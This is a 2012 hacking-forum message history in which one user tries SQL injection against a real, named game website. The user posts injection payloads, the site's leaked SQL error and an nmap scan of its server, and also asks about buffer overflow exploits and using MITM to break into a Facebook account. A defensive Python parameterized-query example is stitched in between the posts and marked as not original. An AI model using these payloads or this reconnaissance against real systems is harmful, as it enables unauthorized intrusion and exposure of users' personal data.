Messages - fr0wnR

1
Hacking and Security / Re: Site injectable?
« on: December 10, 2012, 08:08:53 pm »
Thank you for the nice explanation!
How did you find out which keywords are getting filtered out? Just trying or software?
And yeah, the whole software set is old on their server.
Quote
Starting Nmap 5.00 ( http://nmap.org ) at 2012-12-02 22:48 CET
 Interesting ports on 69.36.8.247:
 Not shown: 976 closed ports
 PORT STATE SERVICE VERSION
 21/tcp open ftp ProFTPD 1.3.3c
 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
 25/tcp open smtp Courier smtpd
 26/tcp open smtp Courier smtpd
 53/tcp open domain ISC BIND 9.2.4
 80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 110/tcp open pop3 Courier pop3d
 135/tcp filtered msrpc
 139/tcp filtered netbios-ssn
 143/tcp open imap Courier Imapd (released 2010)
 443/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 445/tcp filtered microsoft-ds
 587/tcp open smtp Courier smtpd
 993/tcp open ssl/imaps?
 995/tcp open ssl/pop3s?
 3000/tcp open http ServerCP httpd
 3001/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 3306/tcp open mysql MySQL 5.0.91-community
 4321/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 5432/tcp open postgresql PostgreSQL DB
 6666/tcp filtered irc
 6667/tcp filtered irc
 6668/tcp filtered irc
 6669/tcp filtered irc
 Service Info: Host: server2.tantrix.com; OS: Unix


Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 30.78 seconds


2
Hacking and Security / Re: Site injectable?
« on: December 10, 2012, 07:37:51 pm »
Wait this is genius  :D
They have MySQL 5.0.91-community.
Will read through the changes, thank you!

3
Hacking and Security / Re: Site injectable?
« on: December 10, 2012, 07:02:50 pm »
Forbidden pages usually means some sort of filtering. Tried @@vErSion? :)
Hmm, doesn't work either..
I will try encoding it, but I don't think this will change anything.
Is it really not injectable??

4
Hacking and Security / Site injectable?
« on: December 10, 2012, 06:26:34 pm »
www.tantrix.com/cgi-bin/forgot_name.cgi?pname='or 1=1; --
This works, I'm getting a sql error:
Quote
Error SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%'or 1=1-%' ORDER BY date_joined DESC: (67.159.36.26 /cgi-bin/forgot_name.cgi?pname='or%201=1- : execute) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' ORDER BY date_joined DESC' at line 1


Now I'm trying to get e.g. the version (with @@version), but then I'm getting to a forbidden page. Does this simply mean that it's not injectable or am I doing something wrong?


This would be my idea with @@version:
Quote
tantrix.com/cgi-bin/forgot_name.cgi?pname=test%'; SELECT @@version; --
Quote
The SQL query then:
SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%test%'; SELECT @@version; -- the rest commented out
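
Added example, not part of the original posts and not the site's code: the defensive counterpart to the query shown in the error message above, with the search term bound as a parameter, LIKE wildcards escaped, and database errors logged server-side instead of echoed to the client. It assumes Python with sqlite3 standing in for the MySQL backend; `find_players`, `escape_like`, `make_demo_db` and the sample rows are hypothetical.

```python
import logging
import sqlite3

log = logging.getLogger("forgot_name")  # hypothetical logger name


def escape_like(term: str) -> str:
    """Make %, _ and the escape character itself literal inside a LIKE pattern."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def find_players(conn, pname):
    """Return (rows, error_message). pname is bound as data, never concatenated."""
    # SQLite needs an explicit ESCAPE clause; MySQL already uses backslash by default.
    sql = ("SELECT uid, player_name, e_mail, country, date_joined FROM players "
           "WHERE player_name LIKE ? ESCAPE '\\' ORDER BY date_joined DESC")
    try:
        pattern = "%" + escape_like(pname) + "%"
        return conn.execute(sql, (pattern,)).fetchall(), None
    except sqlite3.Error:
        # Full detail goes to the server log; the client gets no SQL text.
        log.exception("player lookup failed")
        return [], "Lookup failed. Please try again later."


def make_demo_db():
    """Constructed sample data using the column names from the error message."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE players (uid INTEGER, player_name TEXT, "
                 "e_mail TEXT, country TEXT, date_joined TEXT)")
    conn.executemany("INSERT INTO players VALUES (?, ?, ?, ?, ?)", [
        (1, "alice", "alice@example.test", "NZ", "2012-01-05"),
        (2, "bob", "bob@example.test", "DE", "2012-03-09"),
    ])
    return conn


if __name__ == "__main__":
    db = make_demo_db()
    print(find_players(db, "ali"))          # normal substring search
    print(find_players(db, "'or 1=1; --"))  # quote is plain data: no rows, no error
    print(find_players(db, "%"))            # wildcard is literal: no rows
```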




5
Hacking and Security / Win7 to write exploits
« on: November 18, 2012, 01:28:42 pm »
On which OS do you write your exploits (e.g. for a Filezilla Server or in general windows applications)?
I started to try out some tutorials about writing exploits, but on Windows 7, and I can't figure out how to exploit a Buffer Overflow Vuln. Is this because of the ASLR thingy on win7 or am I just too stupid?
This is the tutorial: https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

6
Hacking and Security / Re: mitm attack only local?
« on: July 10, 2012, 07:21:34 pm »
What about sslstrip? I didn't try it, but I think it can sniff out passwords with ssl encryption..?

7
Hacking and Security / Re: mitm attack only local?
« on: July 10, 2012, 06:49:23 am »
Thanks guys, will tell him!

8
Hacking and Security / mitm attack only local?
« on: July 10, 2012, 01:04:53 am »
Is it possible to use something like a mitm attack not only on the local network, but also over the internet? A friend thinks he could hack a facebook account with a mitm attack, but without being in the same network..  :o  So is this possible?
